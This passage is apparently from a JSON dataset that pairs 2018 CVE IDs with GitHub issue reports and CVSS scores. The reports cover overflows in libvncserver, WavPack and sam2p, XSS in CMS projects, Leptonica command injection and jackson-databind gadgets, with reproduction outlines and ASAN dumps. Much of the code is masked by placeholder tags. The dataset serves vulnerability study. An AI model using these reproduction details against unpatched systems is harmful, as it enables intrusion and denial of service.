callbacks. 
We also recommend prl vzvncserver to sanity check its inputs (including received from APITAG and in this way avoid integer overflows and unreasonably large allocations. Finally, it is good practice to check whether a APITAG succeeded before writing to the memory. The function APITAG came from PATHTAG so its shortcomings also need to be reported to APITAG upstream. Fix: Some aspects of this issue, most importantly covering prl vzvncserver's APITAG callback, have been addressed with commit NUMBERTAG a NUMBERTAG d NUMBERTAG c NUMBERTAG a2be ERRORTAG dd4b NUMBERTAG bb NUMBERTAG b2c5 on NUMBERTAG Related: FILETAG URLTAG cut APITAG mentioned above appears to be no longer part of libvncserver, hence is not otherwise included in description of this issue.",
  32028. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32029. "severity": "CRITICAL",
  32030. "baseScore": 9.8,
  32031. "impactScore": 5.9,
  32032. "exploitabilityScore": 3.9
  32033. },
  32034. {
  32035. "CVE_ID": "CVE-2018-7226",
  32036. "Issue_Url_old": "https://github.com/LibVNC/vncterm/issues/6",
  32037. "Issue_Url_new": "https://github.com/libvnc/vncterm/issues/6",
  32038. "Repo_new": "libvnc/vncterm",
  32039. "Issue_Created_At": "2018-02-18T21:05:27Z",
  32040. "description": "Security: APITAG APITAG integer overflow and unchecked APITAG While I consider this a security relevant issue, I feel there's no overall benefit from reporting it under an embargo, so here goes. As I reported in URLTAG APITAG APITAG callback API is poorly defined (with int instead of APITAG ) and poorly used by APITAG (without sanitization of the length, and passing in the client specified full length even if fewer bytes were actually read from the client). I also mentioned callback implementation side issues, as illustrated by prl vzvncserver's callback, which was based off vncterm's (hence the report in here) and which has since been fixed in prl vzvncserver. vncterm's implementation of the callback was and still is: CODETAG Besides the conversion to signed int during the call, there's also APITAG in the implementation, which may cause an integer overflow resulting in e.g. APITAG (which succeeds) followed by APITAG (which writes beyond the allocated memory). And there's no check for APITAG possibly returning NULL. I first found the issue during Openwall's security audit of the Virtuozzo NUMBERTAG product, which reuses this code in its prl vzvncserver component. A corresponding Virtuozzo NUMBERTAG fix is: URLTAG We would like to thank the Virtuozzo company for funding the effort. Included below is the relevant excerpt from our Virtuozzo NUMBERTAG report: cut NUMBERTAG PSBM NUMBERTAG prl vzvncserver and APITAG integer overflows, unlimited memory allocations, and unchecked APITAG Severity: medium Thread NUMBERTAG prl vzvncserver\" A particular combination of these NUMBERTAG problems is demonstrated by sending the output of APITAG to prl vzvncserver's TCP port, when prl vzvncserver is running without password. APITAG running with password, authentication would be needed before the specific vulnerable code can be reached, and the string to send would accordingly be longer.) 
This first causes APITAG to allocate NUMBERTAG APITAG of address space and then to hand out this uninitialized memory to the prl vzvncserver/console.c: APITAG callback, which would attempt to make another similar allocation and make a copy of the data. Unfortunately, this APITAG API, as well as many others, is defined to use \"int\" rather than \"size_t\" for data sizes, and indeed prl vzvncserver uses \"int\" too. For this particular request, this results in a zero byte allocation with APITAG which succeeds, and then in a APITAG of (size_t NUMBERTAG bytes to it. With a range of other similar requests, APITAG may instead be made to fail (for trying to allocate a ridiculous amount of address space, sign extended to NUMBERTAG bit), in which case the APITAG more reliably fails on a NULL pointer dereference. Either way, the service crashes. Finally, it is possible to have the process actually write to (and thus allocate for real) almost NUMBERTAG APITAG of memory with one request, by making the length field just below NUMBERTAG APITAG If no data is sent, then NUMBERTAG APITAG would be written from the uninitialized memory (likely mostly read as zero) to the memory allocated by prl vzvncserver's callback. If the data is actually sent, then first it is written to memory by APITAG and then is copied by the callback, for NUMBERTAG APITAG total. Exploitability of this specific issue into something worse than these varying possibilities is highly doubtful (although exploitation of unlimited size APITAG is not unheard of), but all NUMBERTAG of these issues are prevalent in prl vzvncserver and APITAG code in general, so maybe the impact of another similar issue would more obviously be worse. We recommend that sanity checks be introduced into APITAG so that it doesn't try to allocate unreasonable amounts of memory and pass unsafe sizes to callbacks. 
We also recommend prl vzvncserver to sanity check its inputs (including received from APITAG and in this way avoid integer overflows and unreasonably large allocations. Finally, it is good practice to check whether a APITAG succeeded before writing to the memory. The function APITAG came from PATHTAG so its shortcomings also need to be reported to APITAG upstream. Fix: Some aspects of this issue, most importantly covering prl vzvncserver's APITAG callback, have been addressed with commit NUMBERTAG a NUMBERTAG d NUMBERTAG c NUMBERTAG a2be ERRORTAG dd4b NUMBERTAG bb NUMBERTAG b2c5 on NUMBERTAG Related: FILETAG URLTAG cut",
  32041. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32042. "severity": "CRITICAL",
  32043. "baseScore": 9.8,
  32044. "impactScore": 5.9,
  32045. "exploitabilityScore": 3.9
  32046. },
  32047. {
  32048. "CVE_ID": "CVE-2018-7251",
  32049. "Issue_Url_old": "https://github.com/anchorcms/anchor-cms/issues/1247",
  32050. "Issue_Url_new": "https://github.com/anchorcms/anchor-cms/issues/1247",
  32051. "Repo_new": "anchorcms/anchor-cms",
  32052. "Issue_Created_At": "2018-02-19T11:21:20Z",
  32053. "description": "Vulnerability . Hey, I just noted that in anchor CMS error logs in APITAG in many a blogs and sites using Anchor are public which may have a high potential impact revealing server paths and other details . The most severe being that of revealing database username and password as in PATHTAG I will be filing a CVE based on this heuristic research that reveals it has a serious vulnerability. Looking forward to your views on the same .. Regards, APITAG Researcher",
  32054. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32055. "severity": "CRITICAL",
  32056. "baseScore": 9.8,
  32057. "impactScore": 5.9,
  32058. "exploitabilityScore": 3.9
  32059. },
  32060. {
  32061. "CVE_ID": "CVE-2018-7253",
  32062. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/28",
  32063. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/28",
  32064. "Repo_new": "dbry/wavpack",
  32065. "Issue_Created_At": "2018-02-04T21:02:20Z",
  32066. "description": "heap buffer overflow while running wavpack. We got another one ( CVETAG heap buffer overflow running wavpack with \" y APITAG option Running 'wavpack y APITAG with the attached file raises heap buffer overflow which may allow a remote attacker to cause unspecified impact including denial of service attack I expected the program to terminate without segfault, but the program crashes as follow ERRORTAG This bug was found with a fuzzer developed by APITAG group at KAIST poc.wav is available at CVETAG",
  32067. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32068. "severity": "HIGH",
  32069. "baseScore": 7.8,
  32070. "impactScore": 5.9,
  32071. "exploitabilityScore": 1.8
  32072. },
  32073. {
  32074. "CVE_ID": "CVE-2018-7254",
  32075. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/26",
  32076. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/26",
  32077. "Repo_new": "dbry/wavpack",
  32078. "Issue_Created_At": "2018-02-03T12:55:58Z",
  32079. "description": "Global buffer overflow while running wavpack. Forwarding a bug report we received in the Debian Bug Tracker ( CVETAG global buffer overflow running wavpack with \" y APITAG option Running 'wavpack y APITAG with the attached file raises global buffer overflow which may allow a remote attacker to cause unspecified impact including denial of service attack I expected the program to terminate without segfault, but the program crashes as follow ERRORTAG poc.wav can be downloaded from CVETAG",
  32080. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32081. "severity": "HIGH",
  32082. "baseScore": 7.8,
  32083. "impactScore": 5.9,
  32084. "exploitabilityScore": 1.8
  32085. },
  32086. {
  32087. "CVE_ID": "CVE-2018-7265",
  32088. "Issue_Url_old": "https://github.com/shish/shimmie2/issues/631",
  32089. "Issue_Url_new": "https://github.com/shish/shimmie2/issues/631",
  32090. "Repo_new": "shish/shimmie2",
  32091. "Issue_Created_At": "2018-02-20T16:33:45Z",
  32092. "description": "Stored XSS vulnerability resulting from improper handling of uploaded SVG files. During testing of your project, I came across a stored XSS vulnerability that stems from lack of sanitizing and checking integrity of SVG files being uploaded to the server Reproduction is quite easy as all it requires is going to the image upload feature, then selecting our crafted svg file then visiting the full image to receive the alert. Svg file code: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  32093. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32094. "severity": "MEDIUM",
  32095. "baseScore": 6.1,
  32096. "impactScore": 2.7,
  32097. "exploitabilityScore": 2.8
  32098. },
  32099. {
  32100. "CVE_ID": "CVE-2018-7274",
  32101. "Issue_Url_old": "https://github.com/YABhq/Quarx/issues/116",
  32102. "Issue_Url_new": "https://github.com/grafiteinc/cms/issues/116",
  32103. "Repo_new": "grafiteinc/cms",
  32104. "Issue_Created_At": "2018-02-16T10:32:37Z",
  32105. "description": "Multiple Persistent Cross Site Scripting Vulnerabilities. This is with reference to issue NUMBERTAG Description: Quarx CMS is prone to multiple persistent cross site scripting vulnerabilities because it fails to sanitize user supplied input. Affected pages and parameters: Blog > APITAG FAQ > APITAG Pages > APITAG Widgets > APITAG Menus > APITAG Impact: Attacker can execute arbitrary code in the browser of a random user. Affected version NUMBERTAG latest version) and prior PATHTAG Credit: Preethi Koroth Thanks.",
  32106. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32107. "severity": "MEDIUM",
  32108. "baseScore": 6.1,
  32109. "impactScore": 2.7,
  32110. "exploitabilityScore": 2.8
  32111. },
  32112. {
  32113. "CVE_ID": "CVE-2018-7289",
  32114. "Issue_Url_old": "https://github.com/armadito/armadito-windows-driver/issues/5",
  32115. "Issue_Url_new": "https://github.com/armadito/armadito-windows-driver/issues/5",
  32116. "Repo_new": "armadito/armadito-windows-driver",
  32117. "Issue_Created_At": "2018-02-19T21:19:44Z",
  32118. "description": "Malware with pure UTF NUMBERTAG characters in the filename can bypass detection. Files with names containing pure UTF NUMBERTAG characters can bypass detection. The user mode service will fail to open the file for scanning after the conversion is done to ANSI, because characters that cannot be converted from Unicode are replaced with '?'. URLTAG Below is an image demonstrating the bug. In the first case, the filename is in Arabic and in the second, the filename's first letter is the greek M (U NUMBERTAG C). FILETAG A fix would require a re implementation of the parts of the service dealing with filenames to make them support Unicode.",
  32119. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  32120. "severity": "LOW",
  32121. "baseScore": 3.3,
  32122. "impactScore": 1.4,
  32123. "exploitabilityScore": 1.8
  32124. },
  32125. {
  32126. "CVE_ID": "CVE-2018-7308",
  32127. "Issue_Url_old": "https://github.com/DanWin/hosting/issues/18",
  32128. "Issue_Url_new": "https://github.com/danwin/hosting/issues/18",
  32129. "Repo_new": "danwin/hosting",
  32130. "Issue_Created_At": "2018-02-21T08:32:37Z",
  32131. "description": "CSRF vulnerability in web based Interface. Hey, Just letting you know that this has site wide no CSRF protection . For example on this endpoint FILETAG ,no CSRF tokens are verified when a user does an action",
  32132. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32133. "severity": "HIGH",
  32134. "baseScore": 8.8,
  32135. "impactScore": 5.9,
  32136. "exploitabilityScore": 2.8
  32137. },
  32138. {
  32139. "CVE_ID": "CVE-2018-7408",
  32140. "Issue_Url_old": "https://github.com/npm/npm/issues/19883",
  32141. "Issue_Url_new": "https://github.com/npm/npm/issues/19883",
  32142. "Repo_new": "npm/npm",
  32143. "Issue_Created_At": "2018-02-22T03:41:27Z",
  32144. "description": "Critical Linux filesystem permissions are being changed by latest version. I'm opening this issue because: [ ] npm is crashing. [ ] npm is producing an incorrect install. [X] npm is doing something I don't understand. [X] Other (_see below for feature requests_): What's going wrong? This issue has been happening ever since NUMBERTAG was released a few hours ago. It seems to have completely broken my filesystem permissions and caused me to have to manually fix the permissions of critical files and folders. I believe that it is related to the commit NUMBERTAG e1 which is running chown on the wrong files and folders, sometimes being critical filesystem ones. By using sudo npm on a non root user (root users do not have the same effect), filesystem permissions are being modified. For example, if I run APITAG or APITAG , all commands cause my filesystem to change ownership of directories such as APITAG , APITAG , APITAG , and other critical directories needed for running the system. How can the CLI team reproduce the problem? I am personally using Arch Linux with the latest npm package, installed as root user via: APITAG APITAG APITAG Ensure that your npm is on version NUMBERTAG then, as a non root user, with sudo : APITAG You will find that it fails, sometimes with no warnings and sometimes with an EACCES as it is unable to chown the files in APITAG . No key log files are generated on my system. This was _not_ occurring on my system before the most recent update and using NUMBERTAG resolves the issue so it must be a recent commit. supporting information: APITAG prints NUMBERTAG APITAG prints NUMBERTAG npm config get registry prints: FILETAG Windows, OS APITAG or Linux?: Arch Linux Network issues: Geographic location where npm was run: UK [ ] I use a proxy to connect to the npm registry. [ ] I use a proxy to connect to the web. [ ] I use a proxy when downloading Git repos. 
[ ] I access the npm registry via a VPN [ ] I don't use a proxy, but have limited or unreliable internet access. Container: [ ] I develop using Vagrant on Windows. [ ] I develop using Vagrant on OS X or Linux. [ ] I develop / deploy using Docker. [ ] I deploy to a APITAG APITAG Heroku). APITAG APITAG",
  32145. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  32146. "severity": "HIGH",
  32147. "baseScore": 7.8,
  32148. "impactScore": 5.9,
  32149. "exploitabilityScore": 1.8
  32150. },
  32151. {
  32152. "CVE_ID": "CVE-2018-7440",
  32153. "Issue_Url_old": "https://github.com/DanBloomberg/leptonica/issues/303",
  32154. "Issue_Url_new": "https://github.com/danbloomberg/leptonica/issues/303",
  32155. "Repo_new": "danbloomberg/leptonica",
  32156. "Issue_Created_At": "2018-02-06T08:09:04Z",
  32157. "description": "APITAG Command Injection Vulnerability. An exploitable command injection vulnerability exists in the APITAG of Leptonica NUMBERTAG A specially crafted gplot rootname argument can cause a command injection resulting in arbitrary code execution. An attacker can provide a malicious path as input to an application that passes attacker data to this function to trigger this vulnerability. For details refer to NUMBERTAG URLTAG",
  32158. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32159. "severity": "CRITICAL",
  32160. "baseScore": 9.8,
  32161. "impactScore": 5.9,
  32162. "exploitabilityScore": 3.9
  32163. },
  32164. {
  32165. "CVE_ID": "CVE-2018-7443",
  32166. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/999",
  32167. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/999",
  32168. "Repo_new": "imagemagick/imagemagick",
  32169. "Issue_Created_At": "2018-02-23T07:40:53Z",
  32170. "description": "Dos: (failed to allocate). Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): tiff Trigger Command: convert ../test.tif /dev/null ASAN OUTPUT PATHTAG convert ../test.tif /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG f NUMBERTAG f NUMBERTAG bytes of APITAG (errno NUMBERTAG APITAG memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG e NUMBERTAG e NUMBERTAG e NUMBERTAG e NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f5db NUMBERTAG cb NUMBERTAG f5db4b NUMBERTAG f5db4b NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db7bd NUMBERTAG f5db7bd NUMBERTAG f5db7bf NUMBERTAG PATHTAG NUMBERTAG f5db7bf NUMBERTAG f5db7df NUMBERTAG PATHTAG NUMBERTAG f5db7df NUMBERTAG f5db7df NUMBERTAG PATHTAG NUMBERTAG f5db7df NUMBERTAG f5db7df NUMBERTAG PATHTAG NUMBERTAG f5db7df NUMBERTAG f5db7e NUMBERTAG PATHTAG NUMBERTAG f5db7e NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG a NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG 
PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG c NUMBERTAG f5db NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG b NUMBERTAG f5db NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG c NUMBERTAG f5db NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG d NUMBERTAG f5db NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG d NUMBERTAG f5db8b3c NUMBERTAG PATHTAG NUMBERTAG f5db8b3c NUMBERTAG f5db8b NUMBERTAG PATHTAG NUMBERTAG f5db8b NUMBERTAG f5db8b NUMBERTAG PATHTAG NUMBERTAG f5db8b NUMBERTAG f5db8b NUMBERTAG f5db8b NUMBERTAG f5db8b5e NUMBERTAG PATHTAG NUMBERTAG f5db8b5e NUMBERTAG f5db8d5d NUMBERTAG PATHTAG NUMBERTAG f5db8d5d NUMBERTAG f5db8d5e NUMBERTAG PATHTAG NUMBERTAG f5db8d5e NUMBERTAG f5db8d5f NUMBERTAG PATHTAG NUMBERTAG f5db8d5f NUMBERTAG f5db8d NUMBERTAG f5db8d NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db9be NUMBERTAG PATHTAG NUMBERTAG f5db9be NUMBERTAG f5db9de NUMBERTAG PATHTAG NUMBERTAG f5db9de NUMBERTAG f5db9e NUMBERTAG PATHTAG NUMBERTAG f5db9e NUMBERTAG f5db9f6f NUMBERTAG PATHTAG NUMBERTAG f5db9f6f NUMBERTAG f5db9f NUMBERTAG f5db9f NUMBERTAG f5dba NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG f5dba NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG f5dba NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG f5dba NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG a NUMBERTAG f5dbaedf NUMBERTAG f5dbaedf NUMBERTAG f5dbaf NUMBERTAG PATHTAG NUMBERTAG f5dbb NUMBERTAG f5dbb0ed NUMBERTAG f5dbb0ed NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG PATHTAG NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG PATHTAG NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG fff NUMBERTAG d NUMBERTAG fff NUMBERTAG fa NUMBERTAG FILETAG",
  32171. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32172. "severity": "MEDIUM",
  32173. "baseScore": 6.5,
  32174. "impactScore": 3.6,
  32175. "exploitabilityScore": 2.8
  32176. },
  32177. {
  32178. "CVE_ID": "CVE-2018-7447",
  32179. "Issue_Url_old": "https://github.com/i7MEDIA/mojoportal/issues/82",
  32180. "Issue_Url_new": "https://github.com/i7media/mojoportal/issues/82",
  32181. "Repo_new": "i7media/mojoportal",
  32182. "Issue_Created_At": "2018-02-22T14:46:16Z",
  32183. "description": "Multiple Persistent Cross Site Scripting Vulnerabilities . Description: mojoportal is prone to multiple persistent cross site scripting vulnerabilities because it fails to sanitize user supplied input. The APITAG and APITAG fields of APITAG page are vulnerable. Impact: Attacker can execute arbitrary code in the browser of a random user. Affected version: all PATHTAG Credit: Preethi Koroth Thanks.",
  32184. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  32185. "severity": "MEDIUM",
  32186. "baseScore": 4.8,
  32187. "impactScore": 2.7,
  32188. "exploitabilityScore": 1.7
  32189. },
  32190. {
  32191. "CVE_ID": "CVE-2018-7470",
  32192. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/998",
  32193. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/998",
  32194. "Repo_new": "imagemagick/imagemagick",
  32195. "Issue_Created_At": "2018-02-23T05:36:01Z",
  32196. "description": "Wrong pointer access. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib cairo djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw rsvg tiff webp wmf x xml zlib ASAN OUTPUT APITAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: Found by: Wang Yan APITAG",
  32197. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32198. "severity": "MEDIUM",
  32199. "baseScore": 6.5,
  32200. "impactScore": 3.6,
  32201. "exploitabilityScore": 2.8
  32202. },
  32203. {
  32204. "CVE_ID": "CVE-2018-7487",
  32205. "Issue_Url_old": "https://github.com/pts/sam2p/issues/18",
  32206. "Issue_Url_new": "https://github.com/pts/sam2p/issues/18",
  32207. "Repo_new": "pts/sam2p",
  32208. "Issue_Created_At": "2018-02-12T09:27:09Z",
  32209. "description": "It is a heap buffer overflow in APITAG APITAG Hi, i found a heap buffer overflow bug in the sam2p NUMBERTAG the details are below(ASAN): > ./sam2p NUMBERTAG APITAG heapover EPS: /dev/null > This is sam2p NUMBERTAG Available Loaders: PS PDF JAI PNG JPEG TIFF PNM BMP GIF LBM XPM PCX TGA. > Available Appliers: XWD Meta Empty BMP PNG TIFF6 TIFF6 JAI JPEG JAI JPEG PNM GIF NUMBERTAG a+LZW XPM PSL1C PSL NUMBERTAG PDF PSL2+PDF JAI P APITAG > sam2p: Warning: PCX: PCX file appears to be truncated. > sam2p: Warning: PCX: Error reading PCX colormap. Using grayscale NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG ae9e at pc NUMBERTAG f6 bp NUMBERTAG fffffffd6d0 sp NUMBERTAG fffffffd6c0 > WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG ae9e thread T NUMBERTAG f5 in APITAG PATHTAG NUMBERTAG f5 in in_pcx_reader PATHTAG NUMBERTAG in APITAG , APITAG const&, char const ) PATHTAG NUMBERTAG a in APITAG Files::FILEW&, char const const , bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG ffff6ac NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG ae9e is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG > allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG df2a in emulate_cc_new PATHTAG NUMBERTAG df2a in operator APITAG long) PATHTAG > > SUMMARY: APITAG heap buffer overflow PATHTAG APITAG > Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG 
e NUMBERTAG fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa > Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): > Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa > Heap right redzone: fb > Freed heap region: fd > Stack left redzone: f1 > Stack mid redzone: f2 > Stack right redzone: f3 > Stack partial redzone: f4 > Stack after return: f5 > Stack use after scope: f8 > Global redzone: f9 > Global init order: f6 > Poisoned by user: f7 > Container overflow: fc > Array cookie: ac > Intra object redzone: bb > APITAG internal: fe NUMBERTAG ABORTING POC FILE: URLTAG",
  32210. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32211. "severity": "HIGH",
  32212. "baseScore": 7.8,
  32213. "impactScore": 5.9,
  32214. "exploitabilityScore": 1.8
  32215. },
  32216. {
  32217. "CVE_ID": "CVE-2018-7489",
  32218. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1931",
  32219. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1931",
  32220. "Repo_new": "fasterxml/jackson-databind",
  32221. "Issue_Created_At": "2018-02-11T02:03:28Z",
  32222. "description": "Two c3p0 gadgets to exploit default typing issue. (note: placeholder until versions are released) From an email report there are NUMBERTAG other c3p0 classes (above and beyond ones listed in NUMBERTAG need to be blocked.",
  32223. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32224. "severity": "CRITICAL",
  32225. "baseScore": 9.8,
  32226. "impactScore": 5.9,
  32227. "exploitabilityScore": 3.9
  32228. },
  32229. {
  32230. "CVE_ID": "CVE-2018-7551",
  32231. "Issue_Url_old": "https://github.com/pts/sam2p/issues/28",
  32232. "Issue_Url_new": "https://github.com/pts/sam2p/issues/28",
  32233. "Repo_new": "pts/sam2p",
  32234. "Issue_Created_At": "2018-02-23T02:39:01Z",
  32235. "description": "invalid free in APITAG (in APITAG There is an invalid free in APITAG that leads to a Segmentation fault at sam2p NUMBERTAG A crafted input will lead to denial of service attack. Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
  32236. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32237. "severity": "CRITICAL",
  32238. "baseScore": 9.8,
  32239. "impactScore": 5.9,
  32240. "exploitabilityScore": 3.9
  32241. },
  32242. {
  32243. "CVE_ID": "CVE-2018-7552",
  32244. "Issue_Url_old": "https://github.com/pts/sam2p/issues/30",
  32245. "Issue_Url_new": "https://github.com/pts/sam2p/issues/30",
  32246. "Repo_new": "pts/sam2p",
  32247. "Issue_Created_At": "2018-02-23T02:47:45Z",
  32248. "description": "invalid free in APITAG (in APITAG There is an invalid free in APITAG that leads to a Segmentation fault at sam2p NUMBERTAG A crafted input will lead to denial of service attack. Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
  32249. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32250. "severity": "CRITICAL",
  32251. "baseScore": 9.8,
  32252. "impactScore": 5.9,
  32253. "exploitabilityScore": 3.9
  32254. },
  32255. {
  32256. "CVE_ID": "CVE-2018-7553",
  32257. "Issue_Url_old": "https://github.com/pts/sam2p/issues/32",
  32258. "Issue_Url_new": "https://github.com/pts/sam2p/issues/32",
  32259. "Repo_new": "pts/sam2p",
  32260. "Issue_Created_At": "2018-02-23T07:22:41Z",
  32261. "description": "It is a heap buffer overflow vulnerability in APITAG APITAG . Hi, i found a heap buffer overflow vulnerability in the sam2p NUMBERTAG reason: URLTAG URLTAG The crash happened in the APITAG function of the file in_pcx.cpp in line NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32262. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32263. "severity": "CRITICAL",
  32264. "baseScore": 9.8,
  32265. "impactScore": 5.9,
  32266. "exploitabilityScore": 3.9
  32267. },
  32268. {
  32269. "CVE_ID": "CVE-2018-7554",
  32270. "Issue_Url_old": "https://github.com/pts/sam2p/issues/29",
  32271. "Issue_Url_new": "https://github.com/pts/sam2p/issues/29",
  32272. "Repo_new": "pts/sam2p",
